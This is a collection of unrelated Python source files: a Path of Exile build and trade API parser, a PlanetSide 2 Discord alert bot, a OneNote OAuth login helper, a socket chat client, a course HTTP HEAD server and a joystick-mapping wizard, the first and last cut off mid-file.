stats['total_dps'] = tree.find('Build/PlayerStat[@stat="TotalDPS"]').attrib['value']
stats['level'] = tree.find('Build').attrib['level']
try:
main_group = int(tree.find('Build').attrib.get('mainSocketGroup', 1))
skill_in_group = int(skill_slots[main_group - 1].attrib.get('mainActiveSkill', 1))
stats['main_skill'] = skill_slots[main_group - 1].getchildren()[skill_in_group - 1].attrib['nameSpec']
except Exception:
stats['main_skill'] = " "
stats['crit_chance'] = tree.find('Build/PlayerStat[@stat="PreEffectiveCritChance"]').attrib['value']
stats['effective_crit_chance'] = tree.find('Build/PlayerStat[@stat="CritChance"]').attrib['value']
stats['chance_to_hit'] = tree.find('Build/PlayerStat[@stat="HitChance"]').attrib['value']
stats['str'] = tree.find('Build/PlayerStat[@stat="Str"]').attrib['value']
stats['dex'] = tree.find('Build/PlayerStat[@stat="Dex"]').attrib['value']
stats['int'] = tree.find('Build/PlayerStat[@stat="Int"]').attrib['value']
stats['life'] = tree.find('Build/PlayerStat[@stat="Life"]').attrib['value']
stats['life_regen'] = tree.find('Build/PlayerStat[@stat="LifeRegen"]').attrib['value']
stats['es'] = tree.find('Build/PlayerStat[@stat="EnergyShield"]').attrib['value']
stats['es_regen'] = tree.find('Build/PlayerStat[@stat="EnergyShieldRegen"]').attrib['value']
try:
stats['degen'] = tree.find('Build/PlayerStat[@stat="TotalDegen"]').attrib['value']
except AttributeError:
stats['degen'] = "0"
stats['evasion'] = tree.find('Build/PlayerStat[@stat="Evasion"]').attrib['value']
stats['block'] = tree.find('Build/PlayerStat[@stat="BlockChance"]').attrib['value']
stats['spell_block'] = tree.find('Build/PlayerStat[@stat="SpellBlockChance"]').attrib['value']
stats['dodge'] = tree.find('Build/PlayerStat[@stat="AttackDodgeChance"]').attrib['value']
stats['spell_dodge'] = tree.find('Build/PlayerStat[@stat="SpellDodgeChance"]').attrib['value']
stats['fire_res'] = tree.find('Build/PlayerStat[@stat="FireResist"]').attrib['value']
stats['cold_res'] = tree.find('Build/PlayerStat[@stat="ColdResist"]').attrib['value']
stats['light_res'] = tree.find('Build/PlayerStat[@stat="LightningResist"]').attrib['value']
stats['chaos_res'] = tree.find('Build/PlayerStat[@stat="ChaosResist"]').attrib['value']
try:
stats['power_charges'] = tree.find('Build/PlayerStat[@stat="PowerChargesMax"]').attrib['value']
except Exception:
stats['power_charges'] = '3'
try:
stats['frenzy_charges'] = tree.find('Build/PlayerStat[@stat="FrenzyChargesMax"]').attrib['value']
except Exception:
stats['frenzy_charges'] = '3'
try:
stats['endurance_charges'] = tree.find('Build/PlayerStat[@stat="EnduranceChargesMax"]').attrib['value']
except Exception:
stats['endurance_charges'] = '3'
except AttributeError:
raise OutdatedPoBException()
return stats
def parse_poe_char_api(json, cl, items_only=False):
rarity = {
0: "Normal",
1: "Magic",
2: "Rare",
3: "Unique",
4: "Gem"
}
equipped = {}
threads = []
obj_dict = {}
for item in json['items']:
# TODO: Find a more idiomatic way to do this
# As it is now, this dict should only ever contain values of type `int`
char_item = defaultdict(int)
if items_only and 'Prophecy' in item['icon'] or 'Divination' in item['icon']:
equipped['Item'] = item
continue
char_item['rarity'] = rarity[item['frameType']]
char_item['name'] = item["name"].split('>>')[-1]
if 'properties' in item:
for prop in item['properties']:
if prop['name'] == "Quality":
char_item['quality'] = int(prop['values'][0][0][1:-1])
# Weapon stats
if prop['name'] == "Physical Damage":
char_item['physical_min'] = prop['values'][0][0].split('-')[0]
char_item['physical_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Fire Damage":
char_item['fire_min'] = prop['values'][0][0].split('-')[0]
char_item['fire_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Cold Damage":
char_item['cold_min'] = prop['values'][0][0].split('-')[0]
char_item['cold_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Lightning Damage":
char_item['lightning_min'] = prop['values'][0][0].split('-')[0]
char_item['lightning_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Chaos Damage":
char_item['chaos_min'] = prop['values'][0][0].split('-')[0]
char_item['chaos_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Critical Strike Chance":
char_item['critical_chance'] = prop['values'][0][0]
if prop['name'] == "Attacks per Second":
char_item['attack_speed'] = prop['values'][0][0]
if prop['name'] == "Weapon Range":
char_item['range'] = prop['values'][0][0]
# Armour Stats
if prop['name'] == "Armour":
char_item['armour'] = prop['values'][0][0]
if prop['name'] == "Energy Shield":
char_item['energy_shield'] = prop['values'][0][0]
if prop['name'] == "Evasion":
char_item['evasion'] = prop['values'][0][0]
if char_item['name'] == '':
char_item['name'] = item["typeLine"]
if char_item['rarity'] == "Magic":
char_item['base'] = get_base_from_magic(item['typeLine'])
else:
char_item['base'] = item["typeLine"]
if items_only:
slot = "Item"
elif 'Ring' in item['inventoryId']:
slot = "Ring 2" if "2" in item['inventoryId'] else "Ring 1"
elif item['inventoryId'] == "Offhand":
slot = "Weapon 2"
elif item['inventoryId'] == "Weapon":
slot = "Weapon 1"
elif item['inventoryId'] == "Helm":
slot = "Helmet"
elif item['inventoryId'] == "BodyArmour":
slot = "Body Armour"
elif item['inventoryId'] == "Flask":
slot = f"Flask {int(item['x']) + 1}"
char_item['name'] = item["typeLine"].split('>>')[-1]
if item['frameType'] == 1 and 'Flask of' in char_item['name']:
char_item['rarity'] = "Magic"
elif item['inventoryId'] in ['Amulet', 'Helm', 'Gloves', 'Belt', 'Flask', 'Boots', 'Weapon', 'PassiveJewels']:
slot = item['inventoryId']
else:
continue
if 'implicitMods' in item:
char_item['implicits'] = item['implicitMods']
else:
char_item['implicits'] = []
if 'explicitMods' in item:
char_item['explicits'] = item['explicitMods']
else:
char_item['explicits'] = []
if 'craftedMods' in item:
for mod in item['craftedMods']:
# FIXME: unresolved attribute
char_item['explicits'].append("{crafted}"f"{mod}")
if 'corrupted' in item:
# FIXME: unresolved attribute
char_item['explicits'].append('Corrupted')
if 'enchantMods' in item:
char_item['implicits'] = ["{crafted}" + item['enchantMods'][0]]
equipped[slot] = {}
if slot == 'PassiveJewels' or items_only:
if type(equipped[slot]) is dict:
equipped[slot] = []
equipped[slot].append(char_item)
else:
equipped[slot] = char_item
if 'socketedItems' in item and not items_only:
equipped[slot]['gems'] = []
for socketed in item['socketedItems']:
if socketed['frameType'] == 4:
gem_d = {'name': socketed['typeLine']}
for prop in socketed['properties']:
if prop['name'] == 'Quality':
gem_d['quality'] = prop['values'][0][0].replace('+', '').replace('%', '')
if prop['name'] == 'Level':
gem_d['level'] = prop['values'][0][0]
if 'quality' not in gem_d:
gem_d['quality'] = 0
equipped[slot]['gems'].append(gem_d)
if slot != 'PassiveJewels' and 'Flask' not in slot:
t = threading.Thread(target=_get_wiki_base, args=(char_item, obj_dict, cl, slot, True))
threads.append(t)
t.start()
for thread in threads:
thread.join()
if items_only:
equipped["items_objects"] = []
for slot in obj_dict:
if not items_only:
equipped[slot]['object'] = obj_dict[slot]
else:
equipped["items_objects"] = obj_dict[slot]
stats = {'equipped': equipped}
if 'character' in json:
stats['level'] = json['character']['level']
stats['ascendancy'] = json['character']['ascendancyClass']
stats['class'] = json['character']['class']
stats['charname'] = json['character']['name']
stats['league'] = json['character']['league']
return stats
def get_base_from_magic(name: str):
return ' '.join(name.split("of")[0].split("'")[-1].split()[1:])
def poe_skill_tree(hashes, asc: str = "None", return_keystones=False, return_asc=False):
char = {
"marauder": 1,
"ranger": 2,
"witch": 3,
"duelist": 4,
"templar": 5,
"shadow": 6,
"scion": 7
}
ascendancy_bytes = {
"marauder": {
"none": 0,
"juggernaut": 1,
"berserker": 2,
"chieftain": 3
},
"ranger": {
"none": 0,
"raider": 1,
"deadeye": 2,
"pathfinder": 3
},
"witch": {
"none": 0,
"occultist": 1,
"elementalist": 2,
"necromancer": 3
},
"duelist": {
"none": 0,
"slayer": 1,
"gladiator": 2,
"champion": 3
},
"templar": {
"none": 0,
"inquisitor": 1,
"hierophant": 2,
"guardian": 3
},
"shadow": {
"none": 0,
"assassin": 1,
"trickster": 2,
"saboteur": 3
},
"scion": {
"none": 0,
"ascendant": 1
}
}
# This took me a real assload of time to figure out
# Either the 4th only or the first 4 bytes represent tree/b64 format version on poe side
# 5th and 6th byte are character class and ascendancy respectively
# Not sure if 7th byte should inherently be 0, but I think its related to start/exit nodes
ba = bytearray([0, 0, 0, 4])
char_class = None
asc = asc.lower()
for a_char in ascendancy_bytes:
if asc in ascendancy_bytes[a_char]:
char_class = a_char
break
if not char_class:
char_class = asc
asc = "none"
ba += bytes([char[char_class]])
ba += bytes([ascendancy_bytes[char_class][asc.lower()]])
ba += bytes([0])
for hash_obj in hashes:
ba += hash_obj.to_bytes(2, 'big')
post = binascii.b2a_base64(ba).decode().replace('+', '-').replace('/', '_')
tree_keystones = []
ascendancy = []
for hash_obj in hashes:
if str(hash_obj) in keystones:
tree_keystones.append(keystones[str(hash_obj)])
if str(hash_obj) in asc_nodes:
ascendancy.append(asc_nodes[str(hash_obj)])
if return_keystones and return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", tree_keystones, ascendancy
elif return_keystones and not return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", tree_keystones
elif return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", ascendancy
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}"
def get_active_leagues():
http = urllib3.PoolManager()
resp = http.request('GET', 'https://www.pathofexile.com/api/trade/data/leagues')
if resp.status != 200:
raise RequestException(resp.data.decode('utf-8'))
leagues = js.loads(resp.data.decode('utf-8'))
return leagues['result']
def _trade_api_query(data, league, endpoint):
http = urllib3.PoolManager()
print(js.dumps(data).encode('utf-8'))
resp = http.request(
'POST', f'https://www.pathofexile.com/api/trade/{endpoint}/{league}',
body=js.dumps(data).encode('utf-8'), headers={'Content-Type': 'application/json'}
)
if resp.status != 200:
raise RequestException(resp.data.decode('utf-8'))
json_result = js.loads(resp.data.decode('utf-8'))
listing_ids = json_result['result']
entries = http.request('GET', f'https://www.pathofexile.com/api/trade/fetch/{",".join(listing_ids[:10])}')
if entries.status != 200:
raise RequestException(entries.data.decode('utf-8'))
return js.loads(entries.data.decode('utf-8'))['result']
def currency_rates(have: str, want: str, league: str):
data = {
"exchange": {
"status": {
"option": "online"
},
"have": [have],
"want": [want]
}
}
listings = _trade_api_query(data, league, 'exchange')
return CurrencyQuery(have, want, league, listings)
def item_price(item, league):
data = {
"query": {
"term": item,
"status": {
"option": "online"
}
},
"sort": {
"price": "asc"
},
}
listings = _trade_api_query(data, league, 'search')
return ItemPriceQuery(item, league, listings)
|
ps2_alert_bot.py | import discord, json, math, schedule, time, sys, os
from dotenv import load_dotenv
from datetime import datetime
import urllib.request as urlreq
import threading
import asyncio
checking_enabled = False
def getEventInfo(serverNumber):
try:
with urlreq.urlopen(
f"https://census.daybreakgames.com/get/ps2:v2/world_event/?type=METAGAME&world_id={serverNumber}&c:limit=1", timeout=10) as url:
data = json.loads(url.read().decode())
except (urlreq.HTTPError, urlreq.URLError) as error:
print(f"An error occured while retrieving the data from API: {error}")
return "N/A"
#except urlreq.timeout:
# print("Request timed out while retrieving the data from API")
# return "N/A"
try:
for p in data['world_event_list']:
event_id = int(p['metagame_event_id'])
timestamp = int(p['timestamp'])
event_state = p["metagame_event_state_name"]
factionPercentage = []
factionPercentage.append("🟦 NC: " + p["faction_nc"][0:4] + "%")
factionPercentage.append("🟥 TR: " + p["faction_tr"][0:4] + "%")
factionPercentage.append("🟪 VS: " + p["faction_vs"][0:4] + "%")
except KeyError:
console_print("An error occured while parsing the json file")
print(data)
return "N/A"
try:
filepath = os.path.dirname(os.path.abspath(__file__))
filepath = os.path.join(filepath, "metagame_event.json")
with open(filepath, "r") as f:
eventy_txt = f.read()
eventy_json = json.loads(eventy_txt)
except:
print("Error reading the file metagame_event.json")
return "N/A"
# getting the time data
current_time = math.ceil(datetime.now().timestamp())
running_time = ((current_time - timestamp) / 60)
running_time = round(running_time, 2)
running_time = str(running_time)
if (event_state == "ended"):
return "ENDED"
if (event_state == "started"): # change this back to started, used only for debugging purposes
# this if statement filters out only the "main" in-game meta alerts (the event IDs may need a revisit due to a game update):
# if ((158 >= event_id) and (event_id >= 123)) or ((193 >= event_id) and (event_id >= 183)):
for entry in eventy_json["metagame_event_list"]:
if (event_id == int(entry["metagame_event_id"])):
event_info_name = entry["name"]["en"]
event_info_desc = entry["description"]["en"]
return event_info_name, event_info_desc, running_time, factionPercentage
print("no event running")
return "N/A" # in case function fails to return a tuple with the info
async def sendHelloInfo(message):
orange = discord.colour.Color.from_rgb(236, 88, 9)
hello_embed = discord.Embed(title="UwU", description="Hello {}".format(message.author), color=orange)
hello_embed.set_image(url="https://cdn.betterttv.net/emote/60448132306b602acc598647/3x.gif")
await message.channel.send(embed=hello_embed)
async def sendAlertInfo(message, server):
orange = discord.colour.Color.from_rgb(236, 88, 9)
serverDict = {
"connery" : 1,
"cobalt" : 13,
"miller" : 10,
"emerald" : 17,
"soltech" : 40,
"jaeger" : 19
}
try:
info = getEventInfo(serverDict[server])
except:
await message.channel.send("Wrong server name") # More like "something happened in getEventInfo"!!!
return
if (info == "N/A"):
await message.channel.send("No info available")
return
if (info == "ENDED"):
alert_embed = discord.Embed(title=f"Currently running events on {server}:",
description="There is no event running at the moment", color=orange)
await message.channel.send(embed=alert_embed)
else:
alert_embed = discord.Embed(title=f"Currently running events on {server}:", description="\n", color=orange)
alert_embed.add_field(name=info[0], value=info[1] + "\n" + "Elapsed time: " + info[2] + " minutes", inline=True)
alert_embed.add_field(name="Current score", value=info[3][0] + " " + info[3][1] + " " + info[3][2], inline=True)
alert_embed.set_footer(text=message.author,
icon_url="https://logo-logos.com/wp-content/uploads/2018/03/discordlogo.png")
await message.channel.send(embed=alert_embed)
async def sendHelpInfo(message):
orange = discord.colour.Color.from_rgb(236, 88, 9)
help_embed = discord.Embed(title="Help", description="Usable bot commands: ", color=orange)
help_embed.add_field(name="?alert info [server name]", value="prints out the current status on given server.",
inline=False)
help_embed.add_field(name="?hi", value="show the bot some attention and love.", inline=False)
await message.channel.send(embed=help_embed)
async def sendDevMessages(message, contents):
print("{0} {1}".format(getTime(), contents))
await message.channel.send(contents)
def getTime():
return datetime.now().strftime("[%H:%M:%S]:")
def console_print(contents):
print("{0} {1}".format(getTime()), contents)
def background_check(message):
global something_is_up
while checking_enabled:
print("standard threading loop is running too")
time.sleep(5)
async def background_check_asynchronous(message):
while checking_enabled:
print("henlo, async loop bezi")
await asyncio.sleep(120)
info = getEventInfo(13)
if info != "N/A" and info != "ENDED":
print("info contains: " + str(info))
await sendAlertInfo(message, "cobalt")
def main():
load_dotenv()
TOKEN = os.getenv('TOKEN')
if (TOKEN == None):
print("Error: .env file with bot token not found.")
sys.exit(1)
client = discord.Client()
@client.event
async def on_ready():
print("{0} Logged in as {1.user}".format(getTime(), client))
@client.event
async def on_message(message):
if message.author == client.user:
return
# maybe define a complete premade embed instead of just color later
orange = discord.colour.Color.from_rgb(236, 88, 9)
if message.content == "?hi":
await sendHelloInfo(message)
if message.content == "?help":
await sendHelpInfo(message)
if message.content.startswith("?alert info"):
server = str(message.content).split()[-1].lower()
if server == "info":
await sendAlertInfo(message, "cobalt")
else:
await sendAlertInfo(message, server)
bg_thread = threading.Thread(name='background', target=background_check, args=[message])
if message.content == "?enable notifications" or message.content == "?en":
global checking_enabled
checking_enabled = True
asyncio.create_task(background_check_asynchronous(message)) # edit to make sure the create_task method is not spawning more threads each time the check is activated!!
if not bg_thread.is_alive():
bg_thread.start()
await sendDevMessages(message, "Automatic event check has been enabled")
if message.content == "?disable notifications" or message.content == "?dn":
checking_enabled = False
await sendDevMessages(message, "Automatic event check has been disabled")
client.run(TOKEN)
if __name__ == "__main__":
main()
|
onenote_auth.py | from oauthlib.oauth2 import TokenExpiredError
from requests_oauthlib import OAuth2Session
import datetime
import json
import logging
import webbrowser
from contextlib import suppress
from http.server import HTTPServer, BaseHTTPRequestHandler
from pathlib import Path
from queue import Queue
from threading import Thread
from time import sleep
from urllib.parse import urlparse
logger = logging.getLogger(__name__)
client_id = 'c55c98cc-9cf9-43dc-8e84-38b60cd514b5'
scope = ['Notes.Read']
auth_url = 'https://login.microsoftonline.com/common/oauth2/v2.0/authorize'
token_url = 'https://login.microsoftonline.com/common/oauth2/v2.0/token'
# Redirect URI registered at:
# https://portal.azure.com/#blade/Microsoft_AAD_IAM/ActiveDirectoryMenuBlade/RegisteredAppsPreview
redirect_uri = 'http://localhost:8000/auth'
token_path = Path.home() / '.onenote-dump-token'
def get_session(new: bool = False):
try:
return session_from_saved_token(new)
except (IOError, TokenExpiredError):
return session_from_user_auth()
def session_from_saved_token(new):
if new:
logger.info('Ignoring saved auth token.')
logger.info(
'NOTE: To switch accounts, you may need to delete all browser '
'cookies for login.live.com and login.microsoftonline.com.'
)
_delete_token()
raise TokenExpiredError
token = _load_token()
expires = datetime.datetime.fromtimestamp(token['expires_at'])
# If the token will expire in the next few minutes, just get a new one.
if expires < datetime.datetime.now() + datetime.timedelta(minutes=5):
logger.debug('Saved token expired.')
raise TokenExpiredError
s = OAuth2Session(client_id, token=token)
return s
def session_from_user_auth():
"""Get an authenticated session by having the user authorize access."""
server = AuthHTTPServer(redirect_uri)
server.start()
# Give the server a moment to start.
# More elegant would be to wait until it responds with a 200.
sleep(3)
s = OAuth2Session(
client_id,
scope=scope,
redirect_uri=redirect_uri,
token_updater=_save_token,
)
authorization_url, state = s.authorization_url(auth_url)
logger.info('Launching browser to authorize... %s', authorization_url)
webbrowser.open(authorization_url)
redirect_url = server.wait_for_auth_redirect()
token = s.fetch_token(
token_url=token_url,
client_id=client_id,
authorization_response=redirect_url,
include_client_id=True,
)
_save_token(token)
return s
class _AuthServerHandler(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.end_headers()
self.wfile.write(b'Request received: ' + self.path.encode())
logger.debug('Queueing %s', self.path)
self.server.queue.put(self.path)
class AuthHTTPServer:
"""Simple HTTP server to handle the authorization redirect.
Note that on Windows this will trigger a "Windows Security Alert" and
prompt the user to allow access through the firewall.
"""
def __init__(self, url):
self.url = urlparse(url)
self.queue = Queue()
self.server = None
def start(self):
"""Start the server."""
thread = Thread(target=self._run_server, name='HTTPServer')
thread.start()
def wait_for_auth_redirect(self):
"""Wait for the authorization redirect."""
path = ''
while self.url.path not in path:
path = self.queue.get()
logger.debug('Received %s', path)
logger.debug('Matched expected redirect; stopping server.')
self.server.shutdown()
return path
def _run_server(self):
address = ('', self.url.port)
self.server = HTTPServer(address, _AuthServerHandler)
self.server.queue = self.queue
self.server.serve_forever()
def _save_token(token):
token_path.write_text(json.dumps(token))
logger.debug('Auth token saved to %s', token_path)
def _load_token():
token = json.loads(token_path.read_text())
logger.debug('Auth token loaded from %s', token_path)
return token
def _delete_token():
with suppress(FileNotFoundError):
token_path.unlink()
|
client3.py | import socket
import sys
from threading import Thread
def send_message(name):
while True:
text = input()
sock.sendall((name + '__' + text).encode())
if text == "exit":
sock.close()
sys.exit()
def receive_message():
while True:
data = sock.recv(1024)
username = data.decode().split('__')[0]
message = data.decode().split('__')[1].strip()
print(f"{username}: {message}")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('127.0.0.1', 1235))
name = input("Username: ")
if not name:
sock.close()
sys.exit(1)
send_thread = Thread(target=send_message, args=[name])
get_thread = Thread(target=receive_message)
send_thread.start()
get_thread.start() |
EchoServerPlusHead.py | #!/usr/bin/env python3
# See https://docs.python.org/3.2/library/socket.html
# for a description of python socket and its parameters
#
# Copyright 2018, Shaden Smith, Koorosh Vaziri,
# Niranjan Tulajapure, Ambuj Nayab, Akash Kulkarni, and Daniel J. Challou
# for use by students enrolled in Csci 4131 at the University of
# Minnesota-Twin Cities only. Do not reuse or redistribute further
# without the express written consent of the authors.
#
import socket
#add the following
import socket
import os
import stat
import sys
import urllib.parse
import datetime
from threading import Thread
from argparse import ArgumentParser
BUFSIZE = 4096
#add the following
CRLF = '\r\n'
METHOD_NOT_ALLOWED = 'HTTP/1.1 405 METHOD NOT ALLOWED{}Allow: GET, HEAD{}Connection: close{}{}'.format(CRLF, CRLF, CRLF, CRLF)
OK = 'HTTP/1.1 200 OK{}{}{}'.format(CRLF, CRLF, CRLF)
NOT_FOUND = 'HTTP/1.1 404 NOT FOUND{}Connection: close{}{}'.format(CRLF, CRLF, CRLF)
FORBIDDEN = 'HTTP/1.1 403 FORBIDDEN{}Connection: close{}{}'.format(CRLF, CRLF, CRLF)
MOVED_PERMANENTLY = 'HTTP/1.1 301 MOVED PERMANENTLY{}Location: https://www.cs.umn.edu/{}Connection: close{}{}'.format(CRLF, CRLF, CRLF, CRLF)
def get_contents(fname):
with open(fname, 'r') as f:
return f.read()
def check_perms(resource):
"""Returns True if resource has read permissions set on 'others'"""
stmode = os.stat(resource).st_mode
return (getattr(stat, 'S_IROTH') & stmode) > 0
def client_talk(client_sock, client_addr):
print('talking to {}'.format(client_addr))
data = client_sock.recv(BUFSIZE)
while data:
print(data.decode('utf-8'))
data = client_sock.recv(BUFSIZE)
# clean up
client_sock.shutdown(1)
client_sock.close()
print('connection closed.')
class HTTP_HeadServer: #A re-worked version of EchoServer
def __init__(self, host, port):
print('listening on port {}'.format(port))
self.host = host
self.port = port
self.setup_socket()
self.accept()
self.sock.shutdown()
self.sock.close()
def setup_socket(self):
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind((self.host, self.port))
self.sock.listen(128)
def accept(self):
while True:
(client, address) = self.sock.accept()
#th = Thread(target=client_talk, args=(client, address))
th = Thread(target=self.accept_request, args=(client, address))
th.start()
# here, we add a function belonging to the class to accept
# and process a request
def accept_request(self, client_sock, client_addr):
print("accept request")
data = client_sock.recv(BUFSIZE)
req = data.decode('utf-8') #returns a string
response=self.process_request(req)
#once we get a response, we chop it into utf encoded bytes
#and send it (like EchoClient)
client_sock.send(bytes(response,'utf-8'))
#clean up the connection to the client
#but leave the server socket for recieving requests open
client_sock.shutdown(1)
client_sock.close()
def process_request(self, request):
print('######\nREQUEST:\n{}######'.format(request))
linelist = request.strip().split(CRLF)
reqline = linelist[0]
rlwords = reqline.split()
if len(rlwords) == 0:
return ''
if rlwords[0] == 'HEAD':
resource = rlwords[1][1:] # skip beginning /
return self.head_request(resource)
else:
return METHOD_NOT_ALLOWED
def head_request(self, resource):
"""Handles HEAD requests."""
path = os.path.join('.', resource) #look in directory where server is running
if resource == 'csumn':
ret = MOVED_PERMANENTLY
elif not os.path.exists(resource):
ret = NOT_FOUND
elif not check_perms(resource):
ret = FORBIDDEN
else:
ret = OK
return ret
#to do a get request, read resource contents and append to ret value.
#(you should check types of accept lines before doing so)
def parse_args():
parser = ArgumentParser()
parser.add_argument('--host', type=str, default='localhost',
help='specify a host to operate on (default: localhost)')
parser.add_argument('-p', '--port', type=int, default=9001,
help='specify a port to operate on (default: 9001)')
args = parser.parse_args()
return (args.host, args.port)
if __name__ == '__main__':
(host, port) = parse_args()
HTTP_HeadServer(host, port) #Formerly EchoServer
|
joystick_creator.py | import sys
import os
import argparse
import json
import time
import math
from robopilot.utils import *
from robopilot.parts.controller import JoystickCreatorController
try:
from prettytable import PrettyTable
except:
print("need: pip install PrettyTable")
class CreateJoystick(object):
def __init__(self):
self.last_button = None
self.last_axis = None
self.axis_val = 0
self.running = False
self.thread = None
self.gyro_axis = []
self.axis_map = []
self.ignore_axis = False
self.mapped_controls = []
def poll(self):
while self.running:
button, button_state, axis, axis_val = self.js.poll()
if button is not None:
self.last_button = button
self.last_axis = None
self.axis_val = 0.0
elif axis is not None and not self.ignore_axis:
if not axis in self.gyro_axis:
self.last_axis = axis
self.last_button = None
self.axis_val = axis_val
def get_button_press(self, duration=10.0):
self.last_button = None
start = time.time()
while self.last_button is None and time.time() - start < duration:
time.sleep(0.1)
return self.last_button
def get_axis_move(self, duration=2.0):
self.last_axis = None
axis_samples = {}
start = time.time()
while time.time() - start < duration:
if self.last_axis:
if self.last_axis in axis_samples:
try:
axis_samples[self.last_axis] = axis_samples[self.last_axis] + math.fabs(self.axis_val)
except:
try:
axis_samples[self.last_axis] = math.fabs(self.axis_val)
except:
pass
else:
axis_samples[self.last_axis] = math.fabs(self.axis_val)
most_movement = None
most_val = 0
for key, value in axis_samples.items():
if value > most_val:
most_movement = key
most_val = value
return most_movement
def clear_scr(self):
print(chr(27) + "[2J")
def create_joystick(self, args):
self.clear_scr()
print("##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##")
print("## Welcome to Joystick Creator Wizard. ##")
print("##~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~##")
print("This will generate code to use your joystick with a Robopilot.")
print()
print("Overview:")
print()
print("First we name each button, then each axis control.")
print("Next we map names to actions.")
print("Finally we output a python file you can use in your project.")
print()
input('Hit Enter to continue')
self.clear_scr()
print("Please plug-in your controller via USB or bluetooth. Make sure status lights are on and device is mapped.")
input('Enter to continue ')
self.clear_scr()
self.init_js_device()
print()
self.init_polling_js()
self.clear_scr()
self.find_gyro()
self.clear_scr()
self.explain_config()
self.clear_scr()
self.name_buttons()
self.clear_scr()
self.name_axes()
self.clear_scr()
self.map_steering_throttle()
self.clear_scr()
self.map_button_controls()
self.clear_scr()
self.revisit_topic()
self.clear_scr()
self.write_python_class_file()
print("Check your new python file to see the controller implementation. Import this in manage.py and use for control.")
self.shutdown()
def init_js_device(self):
from robopilot.parts.controller import JoystickCreatorController
js_cr = None
#Get device file and create js creator helper class
while js_cr is None:
print("Where can we find the device file for your joystick?")
dev_fn = input("Hit Enter for default: /dev/input/js0 or type alternate path: ")
if len(dev_fn) is 0:
dev_fn = '/dev/input/js0'
print()
print("Attempting to open device at that file...")
try:
js_cr = JoystickCreatorController(dev_fn=dev_fn)
res = js_cr.init_js()
if res:
print("Found and accessed input device.")
else:
js_cr = None
except Exception as e:
print("threw exception:" + str(e))
js_cr = None
if js_cr is None:
ret = input("Failed to open device. try again? [Y/n] : ")
if ret.upper() == "N":
exit(0)
self.js = js_cr.js
input("Hit Enter to continue")
def init_polling_js(self):
self.running = True
import threading
self.thread = threading.Thread(target=self.poll)
self.thread.daemon = True
self.thread.start()
def find_gyro(self):
print("Next we are going to look for gyroscope data.")
input("For 5 seconds, move controller and rotate on each axis. Hit Enter then start moving: ")
start = time.time()
while time.time() - start < 5.0:
if self.last_axis is not None and not self.last_axis in self.gyro_axis:
self.gyro_axis.append(self.last_axis)
print()
if len(self.gyro_axis) > 0:
print("Ok, we found %d axes that stream gyroscope data. We will ignore those during labelling and mapping." % len(self.gyro_axis))
else:
print("Ok, we didn't see any events. So perhaps your controller doesn't emit gyroscope data. No problem.")
input("Hit Enter to continue ")
def get_code_from_button(self, button):
code = button
if 'unknown' in button:
try:
code_str = button.split('(')[1][:-1]
code = int(code_str, 16)
except Exception as e:
code = None
print("failed to parse code", str(e))
return code
def explain_config(self):
print("We will display the current progress in this set of tables:")
print()
self.print_config()
print("\nAs you name buttons and map them to controls this table will be updated.")
input("Hit enter to continue")
def name_buttons(self):
done = False
self.ignore_axis = True
self.print_config()
print('Next we will give every button a name. Not analog yet. We will do that next.')
while not done:
print('Tap a button to name it.')
self.get_button_press()
if self.last_button is None:
print("No button was pressed in last 10 seconds. It's possible that your buttons all generate axis commands.")
ret = input("Keep mapping buttons? [Y, n]")
if ret == 'n':
break
elif 'unknown' in self.last_button:
code = self.get_code_from_button(self.last_button)
if code is not None:
if code in self.js.button_names:
ret = input("This button has a name: %s. Are you done naming? (y/N) " % self.js.button_names[code])
if ret.upper() == "Y":
done = True
break
label = input("What name to give to this button:")
if len(label) == 0:
print("No name given. skipping.")
else:
self.clear_scr()
self.js.button_names[code] = label
self.print_config()
else:
print('got press: ', self.last_button)
self.clear_scr()
self.print_config()
def print_config(self):
pt = PrettyTable()
pt.field_names = ["button code", "button name"]
for key, value in self.js.button_names.items():
pt.add_row([str(hex(key)), str(value)])
print("Button Map:")
print(pt)
pt = PrettyTable()
pt.field_names = ["axis code", "axis name"]
for key, value in self.js.axis_names.items():
pt.add_row([str(hex(key)), str(value)])
print("Axis Map:")
print(pt)
pt = PrettyTable()
pt.field_names = ["control", "action"]
for button, control in self.mapped_controls:
pt.add_row([button, control])
for axis, control in self.axis_map:
pt.add_row([axis, control])
print("Control Map:")
print(pt)
def name_axes(self):
self.print_config()
print()
print('Next we are going to name all the axis you would like to use.')
done = False
self.ignore_axis = False
while not done:
print('Prepare to move one axis on the controller for 2 sec.')
ret = input("Hit Enter to begin. D when done. ")
if ret.upper() == 'D':
break
most_movement = self.get_axis_move()
if most_movement is None:
print("Didn't detect any movement.")
res = input("Try again? [Y/n]: ")
if res == "n":
done = True
break
else:
continue
if 'unknown' in most_movement:
code_str = most_movement.split('(')[1][:-1]
print('Most movement on axis code:', code_str)
try:
code = int(code_str, 16)
except Exception as e:
code = None
print("Failed to parse code", str(e))
if code is not None:
label = input("What name to give to this axis: (D when done) ")
if len(label) == 0:
print("No name given. skipping.")
elif label.upper() == 'D':
done = True
else:
self.js.axis_names[code] = label
self.clear_scr()
self.print_config()
else:
print('Got axis: ', self.last_axis)
print()
def write_python_class_file(self):
pyth_filename = None
outfile = None
while pyth_filename is None:
print("Now we will write these values to a new python file.")
pyth_filename = input("What is the name of python file to create joystick code? [default: my_joystick.py]")
if len(pyth_filename) == 0:
pyth_filename = 'my_joystick.py'
print('using filename:', pyth_filename)
print()
try:
outfile = open(pyth_filename, "wt")
except:
ret = input("failed to open filename. Enter another filename? [Y,n]")
if ret == "n":
break
pyth_filename = None
print()
if outfile is not None:
classname = input("What is the name of joystick class? [default: MyJoystick] ")
if len(classname) == 0:
